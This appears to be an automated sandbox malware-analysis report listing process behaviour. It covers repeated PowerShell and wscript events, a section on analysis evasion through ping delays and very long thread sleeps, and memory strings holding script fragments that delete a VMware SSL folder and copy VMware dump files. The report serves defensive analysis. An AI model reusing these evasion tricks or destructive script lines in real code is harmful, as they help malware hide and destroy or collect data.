Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1070
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 626
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 583
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 629
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 780
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1615
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 938
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4418
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 869
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2284
Source: C:\Windows\System32\wscript.exe TID: 7628 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 7620 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe TID: 7568 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032 Thread sleep count: 3206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 Thread sleep count: 1070 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep count: 3086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560 Thread sleep count: 1123 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7880 Thread sleep count: 3447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5980 Thread sleep count: 629 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1536 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876 Thread sleep count: 3963 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832 Thread sleep count: 780 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8392 Thread sleep count: 1615 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524 Thread sleep count: 3211 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8872 Thread sleep count: 6440 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8876 Thread sleep count: 1883 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8996 Thread sleep count: 896 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9012 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9140 Thread sleep count: 938 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9144 Thread sleep count: 393 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 4418 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 1618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8244 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9208 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388 Thread sleep count: 869 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 4568 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8356 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172 Thread sleep count: 2284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.DeleteFolder(datura + "\\Global_Config\\VMware Server\\SSL");
Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VMware\*.dmp@a
Source: wscript.exe, 00000019.00000003.2500215161.00000204E74C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.DeleteFolder(esporim + "\\Global_Config\\VMware Server\\SSL");
Source: wscript.exe, 0000000A.00000002.2757757051.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2750192999.00000245917A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.00000245917A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWy
Source: wscript.exe, 00000019.00000003.2499893796.00000204E7C59000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vMCi
Source: powershell.exe, 00000024.00000002.2530773405.000001EF69F80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWawDe%SystemRoot%\system32\mswsock.dll "FileSystemRights" = [System.Security.AccessControl.FileSystemRights]
Source: wscript.exe, 0000002C.00000003.2481157634.000001A7C6810000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Global_Config\VMware Server\SSL@cNR
Source: wscript.exe, 0000002C.00000002.3474677234.000001A7C6855000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \VMware\*.dmp
Source: wscript.exe, 0000002C.00000003.2480448045.000001A7C6A56000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", datura + "\\Dumps\\");
Source: wscript.exe, 00000019.00000003.2501990211.00000204E7C5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vMCi
